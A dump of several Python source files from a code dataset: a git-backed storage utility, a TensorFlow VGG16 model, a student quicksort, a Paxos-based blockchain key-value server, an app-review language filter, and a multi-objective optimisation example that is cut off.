os.path.exists(path):\n if overwrite:\n shutil.rmtree(path)\n else:\n raise Exception(\"Can't export to %s because path already existed and overwrite is not True\")\n os.mkdir(path)\n _export_dir(obj,path,cache_dir)\n else:\n assert isinstance(obj,StoreFile)\n if os.path.exists(path):\n assert os.path.isdir(path)\n if name:\n path=path+'/'+name\n ps=obj.iter_contentpath()\n ps.sort()\n p=ps[0]\n # path=path+'/'+os.path.basename(p)\n copy_fsitem(p, path)\n\n else:\n for p in obj.iter_contentpath():\n copy_fsitem(p, path)\n # obj.rmself()\n # remove_fsitem(cache_dir)\n # shutil.rmtree(cache_dir)\n @classmethod\n def uploadStoreitem(cls,path, remote_location, remote_branch, cache_dir,add_more=None):\n assert os.path.exists(path)\n if os.path.isdir(path):\n tmp = StoreFolder(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n else:\n tmp = StoreFile(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n if os.path.isfile(path):\n tmp.eat(path)\n else:\n if add_more:\n for k,v in add_more.items():\n tmp.addmore(k,v)\n for p in os.listdir(path):\n p = path + '/' + p\n tmp.eat(p)\n tmp.upload(remote_location=remote_location, remote_branch=remote_branch)\n @staticmethod\n def is_legal_path_to_upload(path):\n path=os.path.basename(path)\n legal_path_chars=StoreItem.legal_path_chars\n # print(legal_path_chars)\n if StoreItem.delimiter in path:\n import logging\n logging.warning('Illegal path \"%s\"!' % (path))\n return False\n for ch in path:\n if ch not in legal_path_chars:\n import logging\n logging.warning('Illegal path \"%s\"!'%(path))\n return False\n return True\n\n @classmethod\n def uploadStoreitemRecursive(cls,path, remote_location=None, remote_branch=None,\n cache_dir='.store.upload.cache',depth=-1,check_path=True):\n # todo: check branch name\n # assert remote_branch not in cls.special_branches\n assert depth>=0 or depth==-1\n assert os.path.exists(path)\n if check_path:\n assert cls.is_legal_path_to_upload(path)\n remote_location=remote_location or default_remote_location\n assert remote_branch\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n target_dir=cache_dir+'/target'\n store_dir=cache_dir+'/stores'\n os.makedirs(target_dir)\n copy_fsitem(path,target_dir)\n path=target_dir+'/'+os.path.basename(path)\n return cls._uploadStoreitemRecursive(path, remote_location, remote_branch, cache_dir=store_dir,depth=depth,check_path=check_path)\n @classmethod\n def _uploadStoreitemRecursive(cls,path, remote_location, remote_branch, cache_dir,depth=0,check_path=True):\n assert os.path.exists(path)\n if check_path:\n assert cls.is_legal_path_to_upload(path)\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n os.makedirs(cache_dir)\n print('path:',path)\n if depth==0:\n if os.path.isdir(path):\n\n tmp = StoreFolder(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n for p in os.listdir(path):\n p = path + '/' + p\n tmp.eat(p)\n else:\n tmp = StoreFile(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n tmp.eat(path)\n else:\n import uuid\n if os.path.isdir(path):\n self_cache_dir = cache_dir+'/self-cache-' + uuid.uuid4().hex\n more={}\n for name in os.listdir(path):\n p=path+\"/\"+name\n if check_path:\n assert cls.is_legal_path_to_upload(p)\n item_cache_dir=cache_dir+'/item-cache-'+name\n os.mkdir(item_cache_dir)\n item_branch=remote_branch+cls.delimiter+name\n cls._uploadStoreitemRecursive(path=p,remote_location=remote_location,remote_branch=item_branch,cache_dir=item_cache_dir,depth=depth-1)\n more[name]=item_branch\n os.mkdir(self_cache_dir)\n tmp = StoreFolder(self_cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.morefile.update(more)\n else:\n tmp = StoreFile(cache_dir, remote_location=remote_location, remote_branch=remote_branch)\n tmp.clean()\n tmp.eat(path)\n tmp.upload(remote_location=remote_location, remote_branch=remote_branch)\n remove_fsitem(path)\n def is_empty(self):\n names=self.listdir()\n for name in names:\n if name not in self.data_list:\n return False\n return True\n def clean(self):\n names=self.listdir()\n for name in names:\n if name in self.data_list:\n continue\n self.remove(name)\n if name=='.more.store':\n self.openFiledict(name)\n\nclass StoreFolder(StoreItem):\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n self.morefile = self.openFiledict('.more.store')\n self.set_type(T.FOLDER)\n def addmore(self,name,branch):\n self.morefile[name]=branch\n def eatStore(self,path,name=None,remote_location=None,remote_branch=None,upload=True,overwrite=False,cache_dir='.tmp',in_depth=0):\n if os.path.exists(cache_dir):\n shutil.rmtree(cache_dir)\n os.makedirs(cache_dir)\n assert os.path.exists(path)\n if not name:\n name=os.path.basename(os.path.abspath(path))\n remote_location = remote_location or self.remote_location\n assert remote_location\n if not remote_branch:\n assert self.remote_branch\n remote_branch=self.remote_branch+self.delimiter+name\n if upload:\n StoreItem.uploadStoreitem(path,remote_location=remote_location,remote_branch=remote_branch,cache_dir=cache_dir)\n self.morefile[name]=remote_branch\n\nclass StoreFile(StoreItem):\n def __init__(self,*args,**kwargs):\n super().__init__(*args,**kwargs)\n self.set_type(T.FILE)\n\n\n\nclass RemoteBranchList(StoreFolder):\n def __init__(self,path=None,remote_location=None,remote_branch=None):\n remote_branch=remote_branch or _BRANCH_LIST\n if not path:\n path=get_default_path(remote_location,remote_branch)\n super().__init__(path,remote_location,remote_branch,is_remote_branch_list=True) # create local branch\n self._init_remote_branch_list()\n def _init_remote_branch_list(self):\n repo=self.repo\n try:\n self._pull_remote()\n if self.is_empty() or not self.exists(_BRANCH_LIST):\n self.openSimpleListfile(_BRANCH_LIST)\n self._push_self()\n except:\n import logging\n logging.warning(\"Can't pull from remote, maybe because local branch is already updated , or remote branch doesn't exist.\")\n def sync_list(self):\n self._try_pull_remote()\n def read_list(self):\n return self.list_branches()\n def list_branches(self):\n return self._read_remote_branch_list()\n def branch_add_if_not_exists(self,branch):\n return self.branch_add(branch)\n def branch_add(self,branch):\n lf=self.openSimpleListfile(_BRANCH_LIST)\n lis=lf.read()\n if branch not in lis:\n self._try_pull_remote()\n lis.append(branch)\n lf.write(lis)\n self._push_self()\n def branch_exists(self,branch):\n if branch in self._read_remote_branch_list():\n return True\n else:\n self._try_pull_remote()\n if branch in self._read_remote_branch_list():\n return True\n else:\n return False\n def _read_remote_branch_list(self):\n return self.openSimpleListfile(_BRANCH_LIST).read()\n\n\n\n\n","sub_path":"build/lib/wk/extra/gitspace/StoreItem.py","file_name":"StoreItem.py","file_ext":"py","file_size_in_byte":19616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"220490977","text":"#!/home/iflyings/VSCode/venv/tensorflow-venv python\n# -*- coding:utf-8 -*-\n# Author: iflyings\nimport tensorflow as tf\n\nclass VGG16:\n def __init__(self, n_classes, is_train = True):\n self.is_train = is_train\n self.n_classes = n_classes\n\n def __conv_wrapper(self, inputs, filters, activation=tf.nn.relu, name=\"conv\"):\n conv = tf.layers.conv2d(\n inputs=inputs,\n filters=filters,\n kernel_size=[3, 3],\n padding=\"same\",\n activation=activation,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n name=name)\n '''\n bn = tf.layers.batch_normalization(conv,\n momentum=0.9,\n epsilon=1e-5,\n scale=True,\n training=self.is_train,\n name=\"bn_\"+name)\n '''\n return conv\n\n def __pool_wrapper(self, inputs, name=\"pool\"):\n return tf.layers.max_pooling2d(\n inputs=inputs, \n pool_size=[2, 2], \n strides=2,\n name=name)\n\n def __dense_wrapper(self, inputs, units, activation=tf.nn.relu, name=\"dense\"):\n return tf.layers.dense(\n inputs=inputs,\n units=units,\n activation=activation,\n kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),\n kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003),\n name=name)\n\n def create(self, inputs):\n with tf.compat.v1.variable_scope('layer_1') as scope:\n conv1_1 = self.__conv_wrapper(inputs, filters=64, name=\"conv1_1\")\n conv1_2 = self.__conv_wrapper(conv1_1, filters=64, name=\"conv1_2\")\n pool1 = self.__pool_wrapper(conv1_2, name=\"pool1\")\n with tf.compat.v1.variable_scope('layer_2') as scope:\n conv2_1 = self.__conv_wrapper(pool1, filters=128, name=\"conv2_1\")\n conv2_2 = self.__conv_wrapper(conv2_1, filters=128, name=\"conv2_2\")\n pool2 = self.__pool_wrapper(conv2_2, name=\"pool2\")\n with tf.compat.v1.variable_scope('layer_3') as scope:\n conv3_1 = self.__conv_wrapper(pool2, filters=256, name=\"conv3_1\")\n conv3_2 = self.__conv_wrapper(conv3_1, filters=256, name=\"conv3_2\")\n conv3_3 = self.__conv_wrapper(conv3_2, filters=256, name=\"conv3_3\")\n pool3 = self.__pool_wrapper(conv3_3, name=\"pool3\")\n with tf.compat.v1.variable_scope('layer_4') as scope:\n conv4_1 = self.__conv_wrapper(pool3, filters=512, name=\"conv4_1\")\n conv4_2 = self.__conv_wrapper(conv4_1, filters=512, name=\"conv4_2\")\n conv4_3 = self.__conv_wrapper(conv4_2, filters=512, name=\"conv4_3\")\n pool4 = self.__pool_wrapper(conv4_3, name=\"pool4\")\n with tf.compat.v1.variable_scope('layer_5') as scope:\n conv5_1 = self.__conv_wrapper(pool4, filters=512, name=\"conv5_1\")\n conv5_2 = self.__conv_wrapper(conv5_1, filters=512, name=\"conv5_2\")\n conv5_3 = self.__conv_wrapper(conv5_2, filters=512, name=\"conv5_3\")\n pool5 = self.__pool_wrapper(conv5_3, name=\"pool5\")\n\n flatten = tf.layers.flatten(pool5)\n\n with tf.compat.v1.variable_scope('layer_6') as scope:\n fc1 = self.__dense_wrapper(flatten, 4096, name=\"fc1\")\n dropout1 = tf.layers.dropout(fc1,training=self.is_train,name=\"dropout1\")\n with tf.compat.v1.variable_scope('layer_7') as scope:\n fc2 = self.__dense_wrapper(dropout1, 4096, name=\"fc2\")\n dropout2 = tf.layers.dropout(fc2,training=self.is_train,name=\"dropout2\")\n with tf.compat.v1.variable_scope('layer_8') as scope:\n fc3 = self.__dense_wrapper(dropout2, self.n_classes, activation=None, name=\"fc3\")\n return fc3","sub_path":"python/vgg16.py","file_name":"vgg16.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"575686641","text":"from NetworkStack import CRC, DataSplitter, IpHandler, MacHandler\nfrom NetworkStack import StopWaitARQ as ARQ\n\nclass NetworkStack():\n def __init__(self):\n self.Splitter = DataSplitter.DataSplitter()\n self.IpHandler = IpHandler.IpHandler()\n self.MacHandler = MacHandler.MacHandler()\n self.CRC = CRC.CRC()\n self.ARQ = ARQ.ARQ()\n","sub_path":"JU/Networks Lab/NetworkStack/NetworkStack.py","file_name":"NetworkStack.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"430681227","text":"class Player:\n def __init__(self, login, score, penalty):\n self.login = login\n self.score = score\n self.penalty = - penalty\n\n def __str__(self):\n return self.login\n\ndef is_score_or_login_better(score_1, score_2, penalty_1, penalty_2, login_1, login_2):\n #print('COMPARATOR',score_1, score_2, penalty_1, penalty_2, login_1, login_2)\n if (score_1 == score_2 and penalty_1 < penalty_2):\n print(score_1 == score_2 and penalty_1 < penalty_2)\n return True\n print(False)\n return False\n\ndef quick_sort(players,left,right, less):\n\n if left >= right:\n return\n mid = (left+right)//2\n sep = players[mid].score\n #print('pivot', players[mid].score)\n i = left\n j = right\n while True:\n while players[i].score < sep:\n i += 1\n while players[j].score > sep:\n j -= 1\n flag = less(players[i].score,players[j].score,players[i].penalty, players[j].penalty, players[i].login, players[j].login)\n if (i <= j):\n #print(i,j)\n #print(players[i].login, players[i].score, players[j].login, players[j].score)\n players[i], players[j] = players[j], players[i]\n #print(players[i].login, players[i].score, players[j].login, players[j].score)\n i += 1\n j -= 1\n if (i > j):\n break\n quick_sort(players, left, j, is_score_or_login_better)\n quick_sort(players, i, right, is_score_or_login_better)\n\n\n\ndef input_data(file_name):\n with open(file_name, 'r') as data:\n player_num = int(data.readline().strip())\n #data = data.read().splitlines()\n players = []\n\n for _ in range(player_num):\n login, score , penalty = data.readline().split()\n players.append(Player(login, int(score), int(penalty)))\n #print(players[_].login, players[_].score, players[_].penalty,)\n\n quick_sort(players, 0, player_num - 1, is_score_or_login_better)\n\n for i in reversed(players):\n print(i.login, i.score, i.penalty)\nif __name__ == '__main__':\n input_data('input.txt')\n\n\n\n\n#quick_sort(x, 0, len(x)-1)\n\n#print(x)\n","sub_path":"sptint_13/effective_quick_sort _task.py","file_name":"effective_quick_sort _task.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"314849647","text":"from network import sendMessage, failLink, updateActiveLink, fixLink\nfrom paxos import Paxos\nfrom blockchain import Blockchain\nfrom block import Block, createBlock\nimport socket\nimport threading\nimport pickle\nimport json\nimport sys\nimport os\nimport queue\nimport time\n\nq = queue.Queue()\n\nkeyValueStore = {}\nhasDecision = {}\n\nblockchain = Blockchain()\n\n#5 different servers.\nwith open(\"./config.json\") as f:\n PORTS = json.load(f)\n\nSOCKETS = {}\nMY_ID = None\npaxos = None\nproposedBlock = None\nnetwork = None\nqueueTimeouts = {}\nleaderEstimate = None\nblockLock = threading.Lock()\n\ndef saveBlockchain():\n global MY_ID\n try:\n with open(\"blockchain\" + MY_ID + \".pickle\", \"wb\") as f:\n pickle.dump(blockchain, f, protocol=pickle.HIGHEST_PROTOCOL)\n except:\n pass\n\ndef reconnect(OTHER_IDS, CLIENTS):\n#connect to all other servers. Save sockets in SERVER_SOCKETS\n print(\"trying to reconnect to all servers\", flush=True)\n for id in OTHER_IDS:\n otherPort = PORTS[id]\n otherSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n otherSocket.connect((socket.gethostname(), int(otherPort)))\n SOCKETS[id] = otherSocket\n\n for client in CLIENTS:\n clientPort = PORTS[client]\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.connect((socket.gethostname(), int(clientPort)))\n SOCKETS[client] = clientSocket\n\n paxos.sockets = SOCKETS\n \n\ndef connectToAll(OTHER_IDS, CLIENTS):\n#connect to all other servers. Save sockets in SERVER_SOCKETS\n print(\"trying to connect to all\", flush=True)\n for id in OTHER_IDS:\n otherPort = PORTS[id]\n otherSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n otherSocket.connect((socket.gethostname(), int(otherPort)))\n SOCKETS[id] = otherSocket\n \n for client in CLIENTS:\n clientPort = PORTS[client]\n clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n clientSocket.connect((socket.gethostname(), int(clientPort)))\n SOCKETS[client] = clientSocket\n initializePaxos()\n print(\"connected to all!\", flush=True)\n\n\ndef onDecision(msg, isLeader):\n global leaderEstimate\n global q, proposedBlock, blockchain\n global blockLock\n #print(\"onDecision insert to blockchain\", flush=True)\n blockLock.acquire()\n leaderEstimate = msg['fromId']\n currBlock = blockchain.head\n duplicateBlock = False\n\n while currBlock is not None:\n if currBlock == msg['operation']:\n duplicateBlock = True\n currBlock = currBlock.prev\n \n clientResponse = \"Block already exists.\"\n\n hasDecision[msg['timestamp']] = True\n\n if duplicateBlock == False:\n blockchain.insert(msg['operation'])\n clientResponse = applyOperations(msg['operation'])\n print(\"Updated Blockchain.\", flush=True)\n if proposedBlock:\n if isLeader and proposedBlock == msg['operation']:\n proposedBlock = None\n head = q.get()\n sendMessage(MY_ID, head[\"client\"], {\n 'msg':clientResponse,\n 'operation': msg['operation'].operation,\n 'type':'SERVER_RESPONSE',\n 'timestamp' : msg['timestamp'],\n 'fromId': MY_ID\n }, SOCKETS, paxos.activeLinks)\n blockLock.release()\n return blockchain.depth\n\ndef applyOperations(block):\n global keyValueStore\n print(\"Applying \" + block.operation[\"op\"] + \" operation...\")\n if block.operation[\"op\"] == 'put':\n if block.operation[\"value\"][0] == '{':\n if block.operation[\"key\"] in keyValueStore and type(keyValueStore[block.operation[\"key\"]]) is dict:\n keyValueStore[block.operation[\"key\"]][block.operation[\"value\"].split(\"'\")[1]] = block.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[block.operation[\"key\"]] = {}\n keyValueStore[block.operation[\"key\"]][block.operation[\"value\"].split(\"'\")[1]] = block.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[block.operation[\"key\"]] = block.operation[\"value\"]\n return 'ACK'\n if block.operation[\"op\"] == 'get':\n if block.operation[\"key\"] in keyValueStore:\n return 'GET ' + str(keyValueStore[block.operation[\"key\"]])\n else:\n return 'NO_KEY'\n\ndef onAccept(msg):\n block = msg['operation']\n return block.previousHash == blockchain.head.hash and int(block.hash[-1],16) < 4\n\ndef initializePaxos():\n global paxos\n print(\"Initializing Paxos\", flush=True)\n paxos = Paxos(SOCKETS, MY_ID, onDecision, onAccept)\n threading.Thread(target=queueWatcher).start()\n\ndef queueWatcher():\n global proposedBlock\n global blockLock\n while True:\n blockLock.acquire()\n if not q.empty():\n ts = q.queue[0][\"timestamp\"]\n if ts in hasDecision:\n if hasDecision[ts] == True:\n print(\"decision already made for this operation\")\n q.get()\n continue\n if proposedBlock is None and not q.empty(): #we are ready to start another round of paxos\n if queueTimeouts[q.queue[0][\"timestamp\"]] == True:\n q.get()\n continue\n proposedBlock = createBlock(q.queue[0][\"operation\"], blockchain.head)\n if not paxos.isLeader:\n paxos.prepareProposal(proposedBlock, q.queue[0][\"timestamp\"]) #start paxos\n print(\"Created a proposal with a \" + q.queue[0][\"operation\"][\"op\"] + \" operation and ballot number of \" + str(paxos.ballotNum), flush=True)\n else:\n paxos.receivePromise(proposalVal=proposedBlock, timestamp=q.queue[0][\"timestamp\"])\n print(\"I'm leader so sending promise with a \" + q.queue[0][\"operation\"][\"op\"] + \" operation and ballot number of \" + str(paxos.ballotNum), flush=True)\n blockLock.release()\n\ndef printQueue():\n print(\"---Current Operations in queue---\", flush=True)\n if q.empty():\n print(\"Queue is empty\", flush=True)\n else: \n for op in q.queue:\n print(\"Operation: \", op[\"operation\"], flush=True)\n print(\"Client: \", op[\"client\"], flush=True)\n print(\"Timestamp: \", op[\"timestamp\"], flush=True)\n print(\" --------- \", flush=True)\n\ndef printBlockchain():\n global blockchain\n print(repr(blockchain), flush=True)\n\ndef printKeyValueStore():\n print(keyValueStore, flush=True)\n \ndef reconstructKeyVal():\n global blockchain\n global keyValueStore\n curBlock = blockchain.head\n while curBlock is not None:\n if curBlock.operation[\"op\"] == 'put':\n if curBlock.operation[\"value\"][0] == '{':\n if curBlock.operation[\"key\"] in keyValueStore and type(keyValueStore[curBlock.operation[\"key\"]]) is dict:\n keyValueStore[curBlock.operation[\"key\"]][curBlock.operation[\"value\"].split(\"'\")[1]] = curBlock.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[curBlock.operation[\"key\"]] = {}\n keyValueStore[curBlock.operation[\"key\"]][curBlock.operation[\"value\"].split(\"'\")[1]] = curBlock.operation[\"value\"].split(\"'\")[3]\n else:\n keyValueStore[curBlock.operation[\"key\"]] = curBlock.operation[\"value\"]\n curBlock = curBlock.prev\n return\n\ndef waitForMyTimeout(timestamp):\n global queueTimeouts\n global hasDecision\n hasDecision[timestamp] = False\n start = int(time.time())\n now = start\n while (now - start < 38):\n now = int(time.time())\n continue\n queueTimeouts[timestamp] = True\n\ndef waitForLeaderTimeout(timestamp, msg):\n global leaderEstimate\n global queueTimeouts\n global hasDecision\n hasDecision[timestamp] = False\n start = int(time.time())\n now = start\n while (now - start < 38):\n now = int(time.time())\n if hasDecision[timestamp] == True:\n return\n\n prevLeaderEstimate = leaderEstimate\n while leaderEstimate == prevLeaderEstimate:\n leaderEstimate = str((int(leaderEstimate)) % 5 + 1)\n\n if hasDecision[timestamp] == False:\n queueTimeouts[msg[\"timestamp\"]] = False\n q.put({\n 'operation' : msg[\"operation\"],\n 'timestamp' : msg[\"timestamp\"],\n 'client' : msg[\"client\"]\n })\n threading.Thread(target=waitForMyTimeout, args=[msg[\"timestamp\"]]).start()\n\ndef listenForMessages(senderSocket, address):\n global blockchain\n global leaderEstimate\n while True:\n try:\n message = senderSocket.recv(8192)\n if message:\n decodedMessage = pickle.loads(message)\n #print(\"decodedMessage type: \" + decodedMessage[\"type\"], flush=True)\n\n if decodedMessage[\"type\"] == 'FAILLINK':\n updateActiveLink(decodedMessage[\"src\"], paxos.activeLinks, False)\n\n if decodedMessage[\"type\"] == 'FIXLINK':\n updateActiveLink(decodedMessage[\"src\"], paxos.activeLinks, True)\n\n if decodedMessage[\"type\"] == 'OPERATION':\n if leaderEstimate == MY_ID:\n print(\"adding operation to queue\", flush=True)\n queueTimeouts[decodedMessage[\"timestamp\"]] = False\n q.put({\n 'operation' : decodedMessage[\"operation\"],\n 'timestamp' : decodedMessage[\"timestamp\"],\n 'client' : decodedMessage[\"client\"]\n })\n threading.Thread(target=waitForMyTimeout, args=[decodedMessage[\"timestamp\"]]).start()\n else:\n sendMessage(MY_ID, leaderEstimate, decodedMessage, SOCKETS, paxos.activeLinks)\n threading.Thread(target=waitForLeaderTimeout, args=[decodedMessage[\"timestamp\"], decodedMessage]).start()\n\n if decodedMessage[\"type\"] == 'PREPARE':\n paxos.receivePrepares(decodedMessage)\n if decodedMessage[\"type\"] == 'PROMISE':\n paxos.receivePromise(decodedMessage)\n if decodedMessage[\"type\"] == 'ACCEPT':\n paxos.receiveAccept(decodedMessage)\n if decodedMessage[\"type\"] == 'ACCEPTED':\n paxos.receiveAccepted(decodedMessage)\n if decodedMessage[\"type\"] == 'DECIDE':\n paxos.receiveDecision(decodedMessage)\n\n saveBlockchain() \n #EOFError gets triggered somwhere here when another server is killed.\n except socket.error as e:\n print(f'Socket at {address} forcibly disconnected with {e}.')\n senderSocket.close()\n break\n\n return\n\ndef handleInput(OTHER_IDS, CLIENTS, MY_ID):\n global blockchain\n global SOCKETS\n while True:\n try:\n cliInput = input()\n if cliInput:\n if cliInput.lower() == \"operation\":\n print(\"doing operation\", flush=True)\n \n if cliInput.lower() == \"connect\":\n print(\"connecting...\", flush=True)\n connectToAll(OTHER_IDS, CLIENTS)\n\n if cliInput.lower() == \"reconnect\":\n print(\"reconnecting...\", flush=True)\n reconnect(OTHER_IDS, CLIENTS)\n \n if cliInput.lower() == \"load blockchain\":\n with open(\"blockchain\" + MY_ID + \".pickle\", \"rb\") as f:\n blockchain = pickle.load(f)\n reconstructKeyVal()\n #reapply operation stuff using blockchain\n \n if cliInput.lower().split(' ')[0] == \"faillink\":\n dest = cliInput.lower().split(' ')[1]\n failLink(MY_ID, dest, SOCKETS, paxos.activeLinks)\n \n if cliInput.lower().split(' ')[0] == \"fixlink\":\n dest = cliInput.lower().split(' ')[1]\n fixLink(MY_ID, dest, SOCKETS, paxos.activeLinks)\n \n if cliInput.lower() == \"printqueue\":\n printQueue()\n\n if cliInput.lower() == \"printchain\":\n printBlockchain()\n \n if cliInput.lower() == \"printstore\":\n printKeyValueStore()\n\n if cliInput.lower() == \"failprocess\":\n os._exit(0)\n\n except EOFError:\n print(\"exception\")\n pass\n #do nothing\n return\n\ndef main():\n #python3 server.py my_id\n global leaderEstimate\n global MY_ID \n if len(sys.argv) != 2:\n print(\"wrong number of arguments\", flush=True)\n MY_ID = str(sys.argv[1])\n MY_PORT = PORTS[MY_ID]\n MY_SOCKET = socket.socket()\n MY_SOCKET.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n MY_SOCKET.bind((socket.gethostname(), int(MY_PORT)))\n MY_SOCKET.listen(32)\n print('Server' + str(MY_ID) + ' started.', flush=True)\n print('Server listening on port ' + str(MY_PORT) + '.', flush=True)\n OTHER_IDS = [\"1\", \"2\", \"3\", \"4\", \"5\"]\n OTHER_IDS.pop(int(MY_ID) - 1)\n leaderEstimate = \"1\"\n\n CLIENTS = [\"C1\", \"C2\", \"C3\"]\n\n threading.Thread(target=handleInput, args=(\n OTHER_IDS, CLIENTS, MY_ID)).start()\n\n while True:\n try:\n senderSocket, address = MY_SOCKET.accept()\n threading.Thread(target=listenForMessages, args=(senderSocket, address)).start()\n except KeyboardInterrupt:\n os._exit(0)\n return\n\nif __name__ == \"__main__\":\n main()","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":13811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"50730212","text":"# -*- coding: utf-8 -*-\n\n'''\nCreated on 13 Dec 2016\n\n@author: Hazim Hanif\n'''\nimport os\nimport codecs\nimport json\nimport re\nimport OpiClass_globals as ocg\n\nglobal wordList\nglobal indonList\nglobal finalList\nglobal english_count\nglobal indon_count\nglobal total_count\nglobal drop_count\nglobal total_apps\n\ntotal_apps=0\nenglish_count=0\nindon_count=0\ntotal_count=0\ndrop_count=0\nfinalList=[]\nrevDir=\"data/reviews/\"\ndictDir=\"data/dict/\"\nfilteredDir=\"data/filtered_reviews/\"\n\ndef saveFilteredReviews(data,file):\n filename = filteredDir+file\n try:\n with codecs.open(filename, 'wb','utf-8') as outfile:\n json.dump(data, outfile, indent=4, sort_keys=True, separators=(',', ':'),ensure_ascii=False)\n except Exception as e:\n print(e)\n\ndef isIndon(wordIndo):\n \n if wordIndo in map(str.lower,[x.strip(\"\\r\\n\\t\") for x in indonList]):\n #print(\"Indo: \"+wordIndo)\n return 1 \n return 0\n\ndef isEnglish(wordEng):\n \n if wordEng in map(str.lower,[x.strip(\"\\r\\n\\t\") for x in wordList]):\n #print(\"English: \"+wordEnglish)\n return 1 \n return 0\n\n \ndef getReviews(data,threadID,appid):\n global english_count\n global indon_count\n global total_count\n global drop_count\n checkcount=0\n i=0\n \n size_data = len(data)\n division=int(size_data/25)\n checkcount+=division\n print(\"Total review:\"+ str(size_data))\n while i < size_data:\n #print(i)\n if i==checkcount and ocg.progress_list[threadID]<85:\n ocg.progress_list[threadID]+=division\n msg='Filtering opinions for %s. Please sit back, relax and have a coffee ☕️' % (appid)\n ocg.socketio.emit('updateVal', {'progress_list': ocg.progress_list, 'text':msg} , broadcast=False)\n checkcount+=division\n \n countEnglish_perRev=0\n countIndon_perRev=0\n words=str(data[i]['revText']).strip(\".,!?:;`~@#$%^&*()-+=*'[]{}|\\\"/<>\")\n words= re.sub(\"\\.\",\" \",words)\n words= re.sub(\"\\,\",\" \",words)\n words= re.sub(\" \",\" \",words)\n words= re.sub(\" \",\" \",words)\n words=words.lower()\n words_split=words.split(sep=\" \")\n\n for word in words_split:\n countEnglish_perRev=countEnglish_perRev+isEnglish(word)\n countIndon_perRev=countIndon_perRev+isIndon(word)\n \n if countEnglish_perRev == len(words_split):\n #print(\"English: \"+words)\n english_count=english_count+1\n drop_count=drop_count+1\n del data[i]\n size_data=size_data-1\n continue\n \n if countIndon_perRev > (len(words_split)/2):\n #print(\"Endon: \"+words)\n indon_count=indon_count+1\n drop_count=drop_count+1\n del data[i]\n size_data=size_data-1\n continue\n \n data[i]['revText']=words\n total_count=total_count+1\n i=i+1\n return(data)\n \ndef openFile(file):\n filename=revDir+file\n with codecs.open(filename,'rb','utf-8') as data_file: \n return(json.load(data_file))\n\ndef loadWordList():\n global wordList\n global indonList\n indonList=[]\n wordList=[]\n \n data=codecs.open(\"data/dict/english.txt\",'rb','utf-8') \n wordList=data.readlines() \n data=codecs.open(\"data/dict/indon.txt\",'rb','utf-8') \n indonList=data.readlines() \n \ndef start(appid,threadID):\n print(\"======Starting Filtering=======\")\n msg='Initiate filtering for %s' % (appid)\n ocg.progress_list[threadID]+=2\n ocg.socketio.emit('updateVal', {'progress_list': ocg.progress_list, 'text':msg} , broadcast=False)\n file=\"%s.json\" % (appid)\n loadWordList()\n data=openFile(file)\n data=getReviews(data,threadID,appid)\n saveFilteredReviews(data,file)\n if ocg.progress_list[threadID]!=85:\n ocg.progress_list[threadID]+=(85-ocg.progress_list[threadID])\n \n msg='Finished filtering for %s' % (appid)\n ocg.socketio.emit('updateVal', {'progress_list': ocg.progress_list, 'text':msg} , broadcast=False)\n print(\"======Finish Filtering=======\")\n ","sub_path":"OpiClass_filter.py","file_name":"OpiClass_filter.py","file_ext":"py","file_size_in_byte":4145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499358399","text":"import os\nimport sys\nimport numpy as np\n\nsys.path.insert(0, os.getcwd())\n\nfrom openbox.optimizer.generic_smbo import SMBO\nfrom openbox.utils.config_space import ConfigurationSpace, UniformFloatHyperparameter\n\n\ndef branin_currin(config):\n dic = config.get_dictionary()\n x1 = dic.get('x1')\n x2 = dic.get('x2')\n px1 = 15 * x1 - 5\n px2 = 15 * x2\n res = dict()\n\n f1 = (px2 - 5.1 / (4 * np.pi ** 2) * px1 ** 2 + 5 / np.pi * px1 - 6) ** 2 + 10 * (1 - 1 / (8 * np.pi)) * np.cos(\n px1) + 10\n f2 = (1 - np.exp(-1 / (2 * x2))) * (2300 * x1 ** 3 + 1900 * x1 ** 2 + 2092 * x1 + 60) / (\n 100 * x1 ** 3 + 500 * x1 ** 2 + 4 * x1 + 20)\n res['objs'] = [f1, f2]\n res['constraints'] = []\n return res\n\n\nbc_params = {\n 'float': {\n 'x1': (0, 1, 0.5),\n 'x2': (0, 1, 0.5)\n }\n}\nbc_cs = ConfigurationSpace()\nbc_cs.add_hyperparameters([UniformFloatHyperparameter(e, *bc_params['float'][e]) for e in bc_params['float']])\nbc_max_hv = 59.36011874867746\nbc_ref_point = [18., 6.]\n\nbo = SMBO(branin_currin, bc_cs,\n advisor_type='mcadvisor',\n task_id='mcparego',\n num_objs=2,\n acq_type='mcparego',\n ref_point=bc_ref_point,\n max_runs=100, random_state=2)\nbo.run()\n\nhvs = bo.get_history().hv_data\nlog_hv_diff = 